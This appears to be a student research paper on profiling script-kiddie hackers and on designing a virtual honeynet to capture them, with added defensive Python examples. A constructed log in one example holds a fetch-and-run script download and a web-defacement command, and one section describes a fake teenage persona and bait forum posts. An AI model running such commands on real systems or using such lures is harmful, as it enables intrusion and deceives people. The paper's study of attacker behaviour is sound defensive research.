Research Paper By: Hasantha Alahakoon | 1: Overview of Cyber crimes 1
Computer Hacker Profiling
Despite being a relatively new domain, the Internet has become a requisite of contemporary society. A
country's political, social and individual performance is even more dependent on the internet than
ever before. In the twentieth century, the internet, or cyberspace, is playing a vital role in most, if
not all, of the key aspects of society such as communication, transport, education, entertainment
and warfare. But with this rapid growth of the internet, going by the popular belief that 'every new
technology leads the way to new kinds of crimes' (Agar 2003), the emergence of a new breed of crimes,
so-called cyber crimes, and a new breed of criminals, so-called cyber-criminals, was inevitable.
Moreover, because of the increased dependency between the internet and the critical services of
contemporary society, these cyber-crimes pose a very real and probable threat. According to
research conducted by McAfee Inc, one of the world's prominent computer security companies, businesses
lost more than one trillion American dollars in the year 2008 alone due to data theft and cyber
crimes, which depicts how devastating they actually are (Research Shows Global Recession Increasing
Risks to Intellectual Property 2009). Therefore, suitable measures to detect and prevent cyber
criminals in advance are of utmost importance, and this paper proposes a method of identifying
cyber criminals, hackers to be exact, based on their behavioural aspects with the help of honeynets.
This paper is organised as follows. Section 1 provides a very brief overview of current cyber
crimes, in order to keep the size of the paper at a manageable level. Section 2 critically
discusses the concept of computer hacking and the different types of computer hackers. Section 3
discusses hacker profiling, a unique signature that can be used to identify computer hackers.
Section 4 provides a detailed, step-by-step discussion of setting up a honeypot, how it functions,
how the activities can be monitored, how evidence can be gathered and how the criminal can be traced
back. Finally, the paper draws its conclusions and provides the grounds for future work.
1: Overview of Cyber crimes
Cyber crimes, a domain which has a long-lasting history that runs as early as the 1970s, yet an
overlooked concept until the early eighties, come in different shapes and flavours. Those are DDOS
attacks, Web Defacement, Identity Theft, Distribution of child pornography, Software Piracy and
Computer Hacking, just to name a few. The following paragraphs provide very brief
introductions to them.
DDOS is an attack conducted by a cyber criminal using several hundred random computers on the
internet to collectively attack a victim computer infrastructure with a continuous workload up to the
point that it can no longer process its legitimate tasks, thus bringing it offline (Janczewski & Colarik
2005, p.86).
Web Defacement, on the other hand, is a cyber criminal accessing and changing the contents of a
popular web server without the consent of the server administrator for the purpose of humiliating the
owners, to gain recognition among the underground community or to convey the hacker's opposition
to the contents of the web page (Janczewski & Colarik 2005, p.99).
Child pornography, though a crime that was known to the world before the advent of the internet, has
been reinforced by cyberspace because it acts as a breeding ground for paedophiles to engage
with and meet children in a virtual world, not to mention that it has made it easier for sex offenders to
produce illicit material, meet offenders with similar interests and exchange those illicit
materials (Hazelwood & Burgess 2009).
Identity theft/Identity Forge, on the other hand, is 'the misappropriation of the identity (such as the
name, date of birth, current address or previous addresses) of another person, without their knowledge
or consent' (CIFAS) and using those details for criminal activities and for purchasing goods and
services (Janczewski & Colarik 2005, p.120).
Software piracy is the unauthorized use or illegal copying of computer software. According to the
Business Software Alliance, as of 2008, pirated software accounts for 41 percent of the software used
on business and home computers, causing estimated financial losses of 53 billion American dollars for
software developers (Bartz 2009).
2: Review of Computer Hacking
Computer hacking or hackers, the focus of this paper, unlike the other disciplines mentioned above,
are hard to define. Just like the term 'hacker', 'computer hacking' too does not have a clear and
concise definition. The term 'hacker', which in the 1970s referred to a programmer with extreme
competence in programming skills and was a sign of respect, now refers to a young programmer who uses
his technical skills to harmful ends such as creating viruses, breaking into others' computers and
crashing machines (Chiesa et al. 2007).
Similarly, in the early 1960s 'Computer Hacking' was defined as 'to put together software programs with
little regard for "official" methods or software writing procedures in order to improve speed and
efficiency' (Chiesa et al. 2007). But today, the Cambridge Advanced Dictionary interprets computer
hacking as 'to get into someone else's computer system without permission in order to find out
information or to do something illegal'. So in today's world hacking can be loosely defined as
unauthorised access to computer systems. But it is hard to draw a fine line between computer hacking
and other computer misuses such as DDOS, Web Defacement, Unauthorised modification etc.
Hacking is not an end, but a means. For instance, in order to perform a DDOS attack, the attacker has
to recruit the zombie machines by hacking into computers and installing malicious software (such as IRC
bots) on them. Similarly, in order to deface a web page, the attacker has to gain access to that
web server by hacking into it.
So it is clear that, hacking is merely a means of performing another crime. Once hacked, the attacker
can perform any crime he desires ranging from DDOS, Web Defacement, and Identity theft to credit
card fraud.
“To some, it is about exploration, learning, and fascination with the inner workings of the technology
that surrounds us; to others, it is more about playing childish pranks, such as rearranging someone's
Web page or displaying pornographic images on a public server.” (Thomas 2002)
2.1: Computer Hackers
In the early 1960s the term 'Hacker' was used by programmers to describe a fellow programmer who
was really competent in programming and who had the ability to change or modify existing code in a
way that would make the software run more efficiently than the 'official' version. But by the
late 1970s, it was not sufficient for a programmer to write efficient code in order to be called a
'hacker'; it was also necessary for him to belong to a hacker culture or to the hacker
'underground'. But today, a 'hacker' is a programmer who merely uses his skills or the tools he
possesses for destructive ends such as network crashing, virus creation and illegal computer access.
The term 'hacker', which was once an honourable term, is now used to describe the programmers once
called 'crackers'. (Chiesa et al. 2007)
Definitions aside, hackers see themselves as a set of people who are motivated by inquisitiveness,
willing to take on challenges, smarter than others and continuously in search of information. In addition
they are strong believers in freedom of information. They believe that information should be
equally available to everyone and that things should be allowed to be improved. One's reputation or
rank in the hacker underground depends on his skills in programming and on various operating
systems, his abilities and knowledge of hacking, and on his willingness to share his knowledge with
others. Though hacking into computer systems without consent is considered illegal,
according to the hacker code of ethics it is acceptable as long as the hacker is not stealing, destroying or
breaching the confidentiality of the owner (Thomas 2002).
However, not all hackers adhere to the 'hacker code of ethics' equally. Therefore the hacker
community can be categorised into two main sections, 'white-hat hackers' and 'black-hat hackers'. As
the names imply, those represent the two extreme ends of the hacking community, the good and the
evil. White-hat hackers are the 'good' hackers who possess the skills of a black hat but have decided
to stay with authorities and governments to help with anti-cyber crime operations. Black-hats, on the
other hand, are the criminal hackers who access others' computer systems illegally and steal and
sell the information residing on them. Between those two extremes reside the 'grey-hat' hackers, who do
not seem to have a clear code of ethics.
Hackers can be further categorised based on their level of expertise in the field of hacking. The
main ones are, among others, 'Wannabe lamer', 'Script-kiddie', 'Cracker', 'Ethical hacker', 'Cyber-
warrior' and 'Industrial spies'. (Chiesa et al. 2007)
Wannabe lamers, the most common type of hackers, are the 'newbies' of the field of computer hacking.
They are new to hacking and lack the expertise needed. The Script-kiddie, the next instalment of the
hacker community, is a slightly more advanced hacker who specialises in using hacking tools
developed by others.
'Cracker', though initially used to describe software pirates, now refers to dangerous hackers who
are technically competent but violent in their nature. An 'Ethical hacker', on the other hand, is a
hacker who has widespread knowledge of several operating systems and who uses his
knowledge in a harmless way. They might hack into a system, but they would not spread chaos as the
crackers do; they might even inform system administrators after the hacking about the security fixes
instead. (Chiesa et al. 2007)
'Cyber warriors' and 'industrial spies' are the professional hackers who have developed various
skills over the years. Unlike less competent hackers such as Script-kiddies and lamers, they like to
maintain a low profile. 'Industrial spies' can be disgruntled or ex-employees and therefore pose a
larger security threat, as they are aware of the computer systems used.
3: Profiling Computer Hackers
With an understanding of the different types of hackers, this section focuses on creating a profile that
would represent a hacker, so that it can be used to attract other hackers to a honeypot for
subsequent study. As already pointed out in the previous section, there are different types of hackers.
Those different types of hackers have different personalities, motives, knowledge, resources
and technical skills. Therefore, the author believes that it is not possible to create a single profile that
would cater for the needs of all of the above hacker types. Therefore the paper focuses on
creating a profile that would appear as a 'Script-kiddie', which would help attract other script-
kiddies to the honeypot. Though the profile might work on the other types of hackers, it will not be
as effective as it is on Script-kiddies.
There are several reasons why the paper selected the Script-kiddie as its target. First and foremost, they
are the most common type of hackers next to the 'wannabe lamer'. Though the 'wannabe lamer' is the
most common type, because of their lower skill level they are not much of a threat to current
computer systems. In addition, most Script-kiddies can also be labelled as 'crackers' since they
are often destructive. Because of their high numbers and their destructive nature, the paper
believes that it is vital to understand them before the other hacker types.
Furthermore, as will be discussed later in the 'profile of a Script-kiddie' section, script-kiddies do
not have a clear target. They scan the internet for specific vulnerabilities and attack those servers,
whereas the big fish have a clear and predefined target. Therefore it is next to impossible to easily
attract 'true' hackers into a honeypot using just a profile (even if a real black-hat is caught, he would
most likely identify that he is in a honeypot and abort), as opposed to script-kiddies, who would
most willingly attack the honeypot (unaware that it is a honeypot) if they think they can bring it down
with their tools. Therefore the paper decided to profile script-kiddies to better understand their
behaviours and their tools of the trade.
3.1: Cyber profiling
Cyber-crime profiling can be defined as 'the investigation, analysis, assessment and reconstruction of
data from a behavioural or psychological perspective extracted from computer systems, networks and
the humans committing the crimes' (Tofoyo 2003). Understanding cyber-criminals better would
undoubtedly help organisations to safeguard their networks. Criminal profiling can be done in one
of two ways, deductive profiling and inductive profiling. In deductive profiling, the criminal's
personality is deduced by observing the crime scene. In inductive profiling, the personality of the
criminal is deduced by comparing him with a set of known offenders (Chiesa et al. 2007). In
traditional criminal profiling, the investigators observe the crime scene behaviour of the
criminal and deduce information about him. But this paper uses a reverse approach to
traditional criminal profiling; it uses inductive profiling. Here, the characteristics of the
criminal (script-kiddie) will be identified by observing known offenders and then a potential crime
scene (a honeypot) of his interest will be developed with the intention of attracting him for further
observation.
In this paper, the deductive method of criminal profiling will be used to create the profile of the
Script-kiddie. The characteristics of the hacker, script-kiddies to be exact, will be identified by
reviewing the available literature on hackers. Those identified characteristics will be used and be
portrayed in the profile that will be created.
3.2: Profile of a Hacker (Script-kiddie)
The Script-kiddie is a slightly more advanced hacker than the 'wannabe lamer' and specialises in using hacking
tools developed by others. While the 'real' hackers develop their own tools (in addition
to the available tools) according to the network they intend to attack, script kiddies always have
to rely on tools developed by others because they possess very little technical skill. They have no
idea of the functionality of those tools or how the exploit works, but they do specialise in using
them. Script-kiddies regularly update their arsenal of tools by visiting sites which provide such tools
(Chiesa et al. 2007).
'Real' hackers penetrate computer systems because of their love of the technology and because
they are inquisitive by their very nature. Contrarily, script kiddies have no interest in learning or
gaining new competences. They do not care about the means; they are only interested in the end result
(Chiesa et al. 2007).
Script-kiddies consist mainly of teenagers between the ages of 10-18. Script kiddies can
function alone or as a group, but they mostly prefer to act alone. The best way to identify a script-
kiddie is that they love to brag in public about their activities (the activities they have carried out
using others' tools). They are mostly driven by fame; they have a strong ego and a higher need to
show off than other hackers. Script kiddies often use IRC chat rooms to brag about their success
and their exploits, whereas the 'real' hackers are confident about their abilities, do not seek outside
recognition, do not try to satisfy their ego and like to keep a low profile (Chiesa et al. 2007).
For 'real' hackers, 'hacking' means being good at computers and operating systems. While a script
kiddie's biggest motive is fame, they might also use hacking to show their anger, to make fun of
others or to vent their frustration and aggressiveness. They might find great satisfaction in hacking
into systems that are considered secure and invulnerable, and this would give them a sense of
ownership and the thrill of the forbidden. The idea of getting caught by the police does not discourage
them; they are excited about it instead. If caught, they think they will be celebrities in their little
hacker underground. (Chiesa et al. 2007)
On the other hand, most script-kiddies have never seriously considered the possibility of getting
arrested. They are overly confident about their 'hacking skills'; they believe that they have taken the
necessary precautions and have wiped out all the traces. They are even ready to go the extra mile by
openly challenging authorities, claiming that they have never been arrested (Chiesa et al. 2007).
The most popular activities among script kiddies are web defacement, DOS, getting control of IRC
chat rooms, kicking their rivals out of the chat room and crashing the chat rooms. When it comes to
penetrating computer systems, the 'real' hackers are well organised and do not leave anything to
chance. They have a clear target, they use sophisticated tools and tricks, they take notes at every
important step, they follow a specific mode of operation (they have a specific attack signature) and
they would even practise social engineering if necessary. But script kiddies are not so well organised.
Their modus operandi is totally different from that of the 'real' hackers. First and foremost, they do not have
a specific target. They just scan the internet for random web servers with known vulnerabilities for
which they have scripts to exploit. Once such a web server is found, with the help of those scripts,
they gain root access, do some browsing, copy the contents if interested, deface the web
page and leave their signature. One significant characteristic of script kiddies, at least of the
majority of them, is that they do not destroy the contents of the webpage; they copy it to a different
location and notify the system administrators about it (Chiesa et al. 2007).
When defacing, script kiddies prefer to select popular and highly visible sites such as government
web sites and large corporation systems. Further, Script-kiddies can be categorised as 'crackers' since
they prefer to crash or DDOS sites with high visibility, as opposed to 'real' hackers, who rarely crash
computer systems deliberately.
3.3: Development of the Physical Profile
In order to attract script-kiddies to the honeypot, it is necessary to visit the underground forums
and IRC chat-rooms where they reside and post numerous comments. Before starting to post in forums, it is
almost always necessary to register and create a profile with them. When registering with a forum, the
user is asked to provide a nickname, password, email address, age, profile picture, gender and
signature. The following section provides a brief discussion of the information a
script-kiddie would potentially provide when registering with such a forum.
According to Chiesa et al., the nickname of a script-kiddie or a hacker can be anything and does not
portray any characteristic of him. But Raoul et al. also state that hackers pick nicknames that they
think are 'cool', or that describe their technical skills, or often the nicknames of elite hackers. They also
pick nicknames from characters of famous movies (some of the famous movies among hackers are 'Wargames',
'Lord of the rings', 'Ferris Bueller's Day Off' and 'The Matrix') (Chiesa et al. 2007).
Therefore when creating the profile it is possible to pick a nickname such as 'm4tr!x_n3o' (the
character from a movie) or 'Pr0metheus' (the nickname of an elite hacker). Script-kiddies, or hackers in
general, prefer to use hacker slang when picking a name or when posting on the forums.
As already mentioned, script kiddies are often teenagers between the ages 10-18. Therefore when
creating the profile, it is suitable to pick an age within that range, preferably close to the upper-end.
Choosing a lower age would sometimes reduce the respect among the other script-kiddies, therefore
reducing the chances of attracting the other hackers.
According to a survey conducted by Chiesa et al., most hackers are boys. According to the
statistics of the survey, 60% of hackers are male. Therefore it is suitable to select 'male' as the
gender in order to better mimic a real script-kiddie.
As there is no literature describing a hacker's profile picture, a picture of the main actor of the
'Matrix' movie will be used to complement the nickname 'm4tr!x_n3o'.
The forums often ask for a signature which is displayed below each of the user's comments.
Since script-kiddies are often high on their ego, aggressive and overestimate their hacking
skills, in order to appear as a real script-kiddie it is necessary to use a signature such as 'hax0r. Real
life is just a hobby' or 'I 0wn u n00bs!'.
Figure 1: An Example profile created at http://www.hackforums.net
After creating the script-kiddie's profile, the next and most important step is to start posting in the
forums. These posts have to be in hacker slang and carefully planned to target the interests of the
script-kiddies so that they are lured into the honeypot.
Chiesa et al. in their book „Profiling hackers‟ provide an example of a posting of a hacker. The post is
as follows:
‘Yo man! Whaz da b3st way t0 hack www.nasa.gov???? Hey c’mon, explain me man!!!’
Therefore, when posting comments, this kind of style and slang would be used to better fit into the
hacker culture. For the purpose of attracting script-kiddies to the honeypot, the following comment can be
posted on various hacker forums.
‘yo n00bs, I f0und di$ n3tw0rk (172.168.0.50) last night while I was d0ing $um pr0bing. L00ks like it
is $ome kind 0f a mu$ic service and its Fu11 of $ecurity bugs!! I am g0nna download as much as
mus!c I like 2day, u know what I mean :P’
Figure 2: An example thread started at http://www.hackforums.net
The comment conveys several messages (at least in the best-case scenario) to a script-kiddie, which
would hopefully exploit their weaknesses. First and foremost, the poster is bragging about his
abilities, which is typical behaviour of a script-kiddie. This bragging and insulting ('noob' is
considered an insult in the hacking community) would trigger a competition among the fellow
aggressive script-kiddies to take control of the server to prove that they are better than the poster.
Secondly, the poster says that the server is full of security bugs and was found while the poster was
probing. Since the most common method script-kiddies use to find vulnerable servers is probe
scanning, the other script-kiddies too would expect to find this server by probing. Since the poster
also comments that the server is full of bugs, the script-kiddies would be further encouraged to either
access it illegally, DDOS it or deface it (a typical script-kiddie's favourite crimes). Since
most script-kiddies are in the age group of 10-18, it was assumed that they would like to
download audio tracks. Therefore, as bait, the poster mentions a music service hosted on that
network. Another important characteristic of this comment is that it cannot be considered
entrapment. The poster is not inviting the fellow hackers to the honeypot; at least not directly.
These kinds of comments posted on various hacker forums would help to attract script-kiddies to the
honeypot.
4: A Honeypot for capturing Script-kiddies
A honeypot is defined by L. Spitzner as an 'information system resource whose value lies in
unauthorized or illicit use of that resource'. Using a honeypot it is possible to better understand
hackers in terms of their technical aspects, such as their root-kits, tools, Trojans and exploits, and
their ethnological aspects, such as their motives, interests and hidden links between different black-hat
groups. Therefore this section of the paper discusses utilising honeypots in order to better
understand script-kiddies.
4.1: Design of the honeypot
For the purpose of observing script-kiddie behaviour, the paper utilises a 3rd generation
honeynet: the 'Roo' Honeywall CDROM provided by the 'Honeynet Project'. The author believes
that it is better to use a well-established honeynet framework for this purpose rather than building one
from scratch. This is because the honeynet framework proposed by the 'Honeynet Project' is
thoroughly tested and evaluated, and, on the other hand, there is no need to reinvent the wheel.
A honeynet is a network of honeypots. In other words, it is a high-interaction honeypot. It allows
hackers to interact with real operating systems, real software and real services, as opposed to low-
interaction honeypots, where the attacker is dealing with an emulated environment. Because of this
real environment provided by honeynets, it is possible to capture more extensive information on
threats, such as how they attack, why they attack, what tools they use and how they communicate, than
with a traditional honeypot. One reason for selecting honeynets for this paper is this ability to collect
in-depth information about the attackers, not to mention the freedom it provides the system
administrator to install a wide array of applications, services and hardware as on a real server (Spitzner
2003).
Since building a real honeynet is complex, expensive and hard to maintain, the paper uses a
virtual honeynet to attract script kiddies. In a traditional honeynet, each honeypot is installed
on a separate computer. Not only is this approach expensive and hard to maintain, but the analysis
of the results is also harder because the evidence is scattered throughout the network. In contrast, the
virtual honeynet occupies only a single computer with virtualisation software installed on it, but
it appears to a script-kiddie as a network of computers with different operating systems.
Therefore the author believes that it is best to use a virtual honeynet to understand script-kiddies.
But virtual honeynets have downsides of their own. First and foremost, if an attacker has the
ability to compromise the virtualisation software, he has the ability to take over the honeynet.
Secondly, it is easier for an attacker to detect a virtual honeynet than a traditional honeynet, thus
jeopardising the whole idea of the honeypot (Know Your Enemy: Defining Virtual Honeynets 2003).
But it was assumed that the target population of the honeynet, the script-kiddies, do not possess such
high-level skills.
In order to further ensure that the script-kiddies cannot gain control of the entire virtual honeynet, it
will be implemented as a 'Hybrid virtual honeynet'. In this case, similar to a traditional honeynet,
firewalls, intrusion detection systems and activity logging will be done on separate devices. Only the
honeypots will be virtualised on a single computer. Not only would this make it impossible for script-
kiddies to gain control of the entire honeynet by just exploiting the virtualisation software, but it
would also preserve the evidence even in case of a honeynet takeover.
4.1.1: Precautions to take when designing the Virtual honeynet
The ability to use the honeynet against other computer systems should be minimised. For
instance, a script-kiddie might try to use the honeynet as a launching pad for DDOS attacks
against other computer systems. Therefore the ability to use the honeypot against other
computers should be minimised. But it is impossible to neutralise this risk, because in order
to observe hacker behaviour it is necessary to provide him with a considerable degree of
freedom (Know Your Enemy: Honeynets 2006).
The script-kiddie should not be able to detect that he is interacting with a honeynet rather than
with an actual server. If they recognise it, the chances are they would abandon the server or try
to bypass the honeynet. Therefore it is crucial to make as few modifications to the honeynet
as possible.
Even if a script-kiddie takes over the honeynet, he should not under any circumstances be able to detect or
modify the collected data. The best way to do this is by storing captured data on a separate
secure computer.
The script-kiddie should never be able to disable the functionality (data control and data
capturing) of the honeynet (Know Your Enemy: Honeynets 2006).
The script-kiddies must not be able to perform illegal activities such as uploading child
pornography, pirated movies, audio and games from the honeynet (Know Your Enemy:
Honeynets 2006).
The script-kiddies must not be entrapped by the honeynet. They should never be forced or
tempted by the honeynet to perform something that they would not do otherwise.
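The first precaution above, limiting how far the honeynet can be turned against other systems while still leaving the attacker room to act, is what the honeywall's data control has to enforce. The Python script below is an added example written for this page, not code from the paper or from the Honeynet Project: it models the decision as a sliding-window limit on outbound connections per honeypot and per protocol, raises an alert the first time a honeypot hits its limit, and runs over constructed sample traffic. The limits, window, addresses and the shape of the traffic are assumptions of the example.

```python
"""Outbound connection limiting on a honeynet gateway (added example).

Models the data-control decision a honeywall makes for traffic leaving the
honeynet: each honeypot may initiate only a bounded number of outbound
connections per protocol within a sliding one-hour window. A compromised
honeypot therefore cannot be turned into a launching pad for DDOS attacks on
third parties, while the attacker keeps enough freedom to be observed.
The limits below are assumptions chosen for this example, not values from
the paper or from the Honeynet Project's Honeywall.
"""
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Assumed per-honeypot, per-protocol limits on outbound connections per window.
LIMITS = {"tcp": 15, "udp": 20, "icmp": 50}
WINDOW_SECONDS = 3600


@dataclass
class Conn:
    ts: int      # epoch seconds at which the honeypot tried to connect out
    src: str     # honeypot address inside the honeynet
    dst: str     # destination outside the honeynet
    proto: str   # "tcp", "udp" or "icmp"


@dataclass
class Verdict:
    allowed: List[Conn] = field(default_factory=list)
    dropped: List[Conn] = field(default_factory=list)
    alerts: List[str] = field(default_factory=list)


class OutboundLimiter:
    """Sliding-window counter keyed by (honeypot, protocol)."""

    def __init__(self, limits: Dict[str, int] = LIMITS, window: int = WINDOW_SECONDS):
        self.limits = limits
        self.window = window
        self._seen: Dict[Tuple[str, str], List[int]] = defaultdict(list)

    def decide(self, c: Conn) -> bool:
        """Return True if the connection may leave the honeynet."""
        hist = self._seen[(c.src, c.proto)]
        # forget connections that have fallen out of the window
        hist[:] = [t for t in hist if c.ts - t < self.window]
        if len(hist) >= self.limits.get(c.proto, 0):
            return False      # unknown protocols have limit 0: always dropped
        hist.append(c.ts)
        return True


def run_data_control(conns: List[Conn], limiter: Optional[OutboundLimiter] = None) -> Verdict:
    """Apply the limiter to a batch of outbound attempts in time order and
    raise one alert per (honeypot, protocol) that hits its limit."""
    limiter = limiter or OutboundLimiter()
    verdict = Verdict()
    alerted = set()
    for c in sorted(conns, key=lambda x: x.ts):
        if limiter.decide(c):
            verdict.allowed.append(c)
            continue
        verdict.dropped.append(c)
        key = (c.src, c.proto)
        if key not in alerted:
            alerted.add(key)
            verdict.alerts.append(
                f"{c.src} reached the {c.proto} outbound limit at t={c.ts}: "
                "possible use of the honeypot as a launching pad")
    return verdict


def sample_traffic() -> List[Conn]:
    """Constructed sample traffic: one honeypot with a slow trickle of
    outbound TCP connections followed by a flood-style burst, and a second
    honeypot sending a few ICMP echoes."""
    conns = [Conn(i * 300, "10.0.0.5", "198.51.100.7", "tcp") for i in range(10)]
    conns += [Conn(4000 + i, "10.0.0.5", "203.0.113.9", "tcp") for i in range(40)]
    conns += [Conn(100 * i, "10.0.0.6", "198.51.100.7", "icmp") for i in range(3)]
    return conns


if __name__ == "__main__":
    v = run_data_control(sample_traffic())
    print(f"allowed={len(v.allowed)} dropped={len(v.dropped)}")
    for a in v.alerts:
        print("ALERT:", a)
```

On the sample traffic the trickle passes, the burst is cut off once the window holds fifteen TCP connections, and a single alert names the honeypot involved. In a real deployment this decision is taken by packet-filtering rules on the gateway rather than by a script; the point of the example is the logic those rules implement, including the trade-off the paper notes: a limit low enough to stop a flood but high enough that the attacker's normal activity is not blocked.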
4.1.2: Architecture of the Honeypot
The honeynet system would mainly consist of three components. Those are the honeywall, the virtual
honeynet and the remote management server.
The honeywall will act as the gateway to the honeynet and it will log all the incoming and outgoing
traffic to and from the honeynet. In case of a successful honeynet penetration, the honeywall would
inform the network administrator. In addition to logging all the traffic, the honeywall would also
prevent using the honeynet against the other computer systems.
Fedora core 3 (fully patched with latest security updates), key-logging software and virtualisation
software would be installed on the honeynet computer. Then with the help of the virtualisation
software, different virtual honeypots will be created inside the honeynet computer. Then different
operating systems will be installed on each of the honeypots. These honeypots would appear as a
network of computers to a script-kiddie.
The honey pot operating systems would be left un-patched with security updates so that the script-
kiddies would detect those individual honeypots as potential targets during their vulnerability
scanning. The relevant software and web pages will be installed on the honeypots to make them look
like real web servers, so that the script-kiddies would try to attack them. Since the network level
traffic is already captured and logged by the honeywall, the honeynet only has to capture the activities
that the script-kiddie would perform inside the honeypots such as his keystrokes.
All the data that is collected by the honeywall and the honeynet would be transferred covertly to the
remote management server for storing. The remote management server will be kept separately from
the honeynet and it will be well secured. In addition to storing data collected from the honeynet, the
remote management server can be also used to control the configuration of the honeynet through a
secure connection.
The data collected from the honeynet can be analysed and, based on the information derived from the
analyses, the script-kiddies can be profiled.
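As an added example, not part of the paper, the script below shows the kind of analysis this step involves. It parses constructed honeywall connection-log lines and honeypot keystroke-log lines and turns them into the behavioural indicators section 3.2 attributes to script-kiddies: untargeted scanning across several hosts, reliance on tools downloaded from elsewhere, gaining root, copying the web content and overwriting the page. The log formats, addresses, command lines, the /var/www document root and the scan thresholds are all assumptions of the example; real honeywall output looks different.

```python
"""Deriving behavioural indicators from honeynet captures (added example).

Parses two constructed log formats, a honeywall connection log and a
honeypot keystroke log, and computes per-attacker indicators matching the
script-kiddie traits described in section 3.2 of the paper. Log formats,
thresholds and the web root are assumptions for the example.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set

# Constructed honeywall connection log: "<ts> <src> -> <dst>:<port> <proto>"
CONN_LOG = """\
1001 203.0.113.44 -> 10.0.0.5:21 tcp
1001 203.0.113.44 -> 10.0.0.5:22 tcp
1001 203.0.113.44 -> 10.0.0.5:80 tcp
1001 203.0.113.44 -> 10.0.0.5:443 tcp
1002 203.0.113.44 -> 10.0.0.6:21 tcp
1002 203.0.113.44 -> 10.0.0.6:22 tcp
1002 203.0.113.44 -> 10.0.0.6:80 tcp
1002 203.0.113.44 -> 10.0.0.6:443 tcp
1003 203.0.113.44 -> 10.0.0.7:80 tcp
1003 203.0.113.44 -> 10.0.0.7:22 tcp
1200 203.0.113.44 -> 10.0.0.6:80 tcp
1500 198.51.100.2 -> 10.0.0.6:22 tcp
"""

# Constructed keystroke log from the honeypots: "<ts> <src> <uid> <command>"
KEY_LOG = """\
1210 203.0.113.44 48 wget http://example.invalid/x.sh
1211 203.0.113.44 48 sh x.sh
1220 203.0.113.44 0 id
1230 203.0.113.44 0 ls /var/www
1240 203.0.113.44 0 cp -r /var/www /tmp/.bak
1250 203.0.113.44 0 echo 'defaced' > /var/www/index.html
1600 198.51.100.2 1000 ls
"""

CONN_RE = re.compile(r"^(\d+) (\S+) -> (\S+):(\d+) (\w+)$")
KEY_RE = re.compile(r"^(\d+) (\S+) (\d+) (.+)$")
WEB_ROOT = "/var/www"          # assumed document root of the decoy web servers
DOWNLOADERS = {"wget", "curl", "ftp", "tftp"}
COPIERS = {"cp", "tar", "scp"}


@dataclass
class Profile:
    src: str
    hosts: Set[str] = field(default_factory=set)
    ports: Set[int] = field(default_factory=set)
    commands: List[str] = field(default_factory=list)
    downloaded_tools: List[str] = field(default_factory=list)
    got_root: bool = False
    copied_content: bool = False
    defaced: bool = False

    @property
    def untargeted_scan(self) -> bool:
        # several hosts probed on a handful of well-known ports, rather than
        # sustained work on one chosen target (thresholds are assumptions)
        return len(self.hosts) >= 3 or len(self.ports) >= 4


def parse_logs(conn_log: str, key_log: str) -> Dict[str, Profile]:
    profiles: Dict[str, Profile] = {}

    def profile_for(src: str) -> Profile:
        return profiles.setdefault(src, Profile(src))

    for line in conn_log.splitlines():
        m = CONN_RE.match(line)
        if not m:
            continue                      # skip malformed lines
        _, src, dst, port, _ = m.groups()
        p = profile_for(src)
        p.hosts.add(dst)
        p.ports.add(int(port))

    for line in key_log.splitlines():
        m = KEY_RE.match(line)
        if not m:
            continue
        _, src, uid, cmd = m.groups()
        parts = cmd.split()
        if not parts:
            continue
        p = profile_for(src)
        p.commands.append(cmd)
        verb = parts[0]
        if verb in DOWNLOADERS:
            p.downloaded_tools.append(cmd)    # fetching someone else's script
        if uid == "0":
            p.got_root = True                 # a command ran as root
        if verb in COPIERS and WEB_ROOT in cmd:
            p.copied_content = True           # copied the site before touching it
        if ">" in cmd and WEB_ROOT in cmd.split(">", 1)[1]:
            p.defaced = True                  # overwrote a file under the web root
    return profiles


def summarise(p: Profile) -> List[str]:
    """Indicator tags in a fixed order, for reporting and for tests."""
    checks = [
        ("untargeted-scan", p.untargeted_scan),
        ("uses-downloaded-tools", bool(p.downloaded_tools)),
        ("root-access", p.got_root),
        ("copied-web-content", p.copied_content),
        ("defacement", p.defaced),
    ]
    return [tag for tag, hit in checks if hit]


if __name__ == "__main__":
    for src, prof in parse_logs(CONN_LOG, KEY_LOG).items():
        print(src, sorted(prof.hosts), sorted(prof.ports), summarise(prof))
```

Run on the constructed logs, the first source is tagged with all five indicators, which is the sequence section 3.2 describes (scan, exploit with a downloaded script, root, copy, deface), while the second source, a single SSH connection and one harmless command, gets no tags. Keeping the connection and keystroke data in separate logs mirrors the paper's split between what the honeywall sees on the network and what the honeypots capture inside the machine.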
4.2: Functionality of the Honeynet
Figure 3: The Architecture of the Virtual Honeynet
Figure 4: Flowchart for the Honeynet
The most important component of the honeynet is the gateway, often called the ‘honeywall’. It
separates the honeynet from the outside network. It is the single point through which all the traffic to
the honeynet passes. It is advisable to use a layer two device as the honeywall in order to reduce the
risk of detection by the script-kiddies (Know Your Enemy: GenII Honeynets 2005).
The honeywall would consist of three Ethernet interfaces. Eth1 is used for the honeynet. Eth0 is used
for the production computers (the production computers are used to profile any internal hackers), and
this interface would stop any attackers from reaching the production computers by exploiting the
honeynet. Eth0 and Eth1 would be in bridging mode in order to reduce the chances of detection.
When in bridging mode, no MAC addresses are assigned to them, there is no hop in between and
therefore the TTL is not decremented; this effectively reduces the chances of detection (Know Your
Enemy: GenII Honeynets 2005).
As already mentioned above, it is crucial not to store the collected data on the same computer as the
honeynet, as an attacker might destroy or modify it. Therefore eth2 would be used to covertly
transmit the collected data to the remote management server. In addition, this interface will also be
used by the remote management server to control the configuration of the honeynet through a secure
shell.
As already mentioned, it is important that the honeynet cannot be used as a launching pad for attacks
on other computer systems. This is achieved by installing data control software such as IPTables and
a network intrusion detection system on the honeywall. IPTables will be configured to control the
number of outbound connections that the honeynet can initiate. When controlling the number of
outbound connections, it is important to note that limiting it too much would restrict the freedom of
the script-kiddie, thus reducing the ability to identify his behaviour properly (it is worth noting that a
script-kiddie often uses outbound connections for FTP, for downloading rootkits and for connecting
to IRC channels). Not only would this restrict his freedom, it would also increase the chances of
detection, as a skilful hacker might purposely increase the outbound connections to see if he is inside
a honeynet (Know Your Enemy: GenII Honeynets 2005).
The network intrusion detection system on the honeywall is used to drop any packets with known
attack signatures. Snort, operating inline as a NIPS, will be used for this.
4.2.1: Activity Monitoring
In addition to the above functionalities, the most important aspect of any honeypot, data capture
and activity monitoring, is done in several layers in the honeynet. Firstly, when IPTables is used in
the honeywall for the purpose of rate limiting the outbound traffic, it also logs all the inbound and
outbound traffic to a separate log file (/var/log/messages) (Know Your Enemy: GenII Honeynets
2005).
Secondly, a packet sniffer such as Snort which is built into the honeywall would be used to further
monitor each and every packet and its corresponding payload. These two approaches, IPTables and
